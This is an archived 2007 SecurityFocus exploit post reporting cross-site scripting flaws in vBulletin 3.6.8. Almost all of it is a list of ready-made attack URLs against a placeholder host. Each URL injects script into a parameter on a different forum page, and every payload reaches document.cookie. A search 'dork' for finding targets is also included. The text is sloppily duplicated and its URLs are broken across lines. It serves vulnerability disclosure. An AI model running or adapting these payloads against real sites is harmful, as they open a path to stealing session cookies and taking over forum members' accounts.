vBulletin V3.6.8 XSS Password Md5 Hash Aug 17 2007 10:56AM
RaeD BsdMail Com
#Discovred By : Hasadya Raed
----------------
#Contact : RaeD (at) BsdMail (dot) Cpm [email concealed]
----------------
#Script: vBulletin V3.6.8ulletin V3.6.8
----------------
#Dork: vBulletin V3.6.8ulletin V3.6.8
----------------
#Exploit :

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28d
ocument.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Eal
ert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1

http://www.Victim.com/vBulletin V3.6.8/index.php?s=<script>alert('document.cookie')</script>

http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28
document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ea
lert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Eale
rt%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert
%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscrip
t%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3
Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly
=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%
3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%
3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ea
lert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert
%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert
%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
alert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus